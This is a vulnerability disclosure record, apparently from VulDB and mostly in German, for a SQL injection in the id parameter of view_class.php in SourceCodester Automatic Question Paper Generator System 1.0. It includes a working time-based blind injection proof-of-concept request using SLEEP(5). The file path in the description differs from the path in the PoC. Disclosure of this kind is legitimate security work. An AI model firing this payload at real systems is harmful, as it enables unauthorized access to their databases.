| Titel | SourceCodester Automatic Question Paper Generator System GET Parameter view_class.php SQL Injection |
|---|
| Beschreibung | A SQL Injection vulnerability was found in SourceCodester Automatic Question Paper Generator System 1.0. The vulnerable file is admin/courses/view_class.php and the injectable parameter is id.
A time-based blind injection poc is:
GET /aqpg/users/classes/view_class.php?id=1' AND (SELECT 7504 FROM (SELECT(SLEEP(5)))lKSD) AND 'svPe'='svPe&_=16795545049481&_=1679554504948 HTTP/1.1 |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| Benutzer | WWesleywww (UID 43117) |
|---|
| Einreichung | 23.03.2023 08:00 (vor 3 Jahren) |
|---|
| Moderieren | 23.03.2023 09:42 (2 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 223660 [SourceCodester Automatic Question Paper Generator System 1.0 GET Parameter view_class.php ID SQL Injection] |
|---|
| Punkte | 20 |
|---|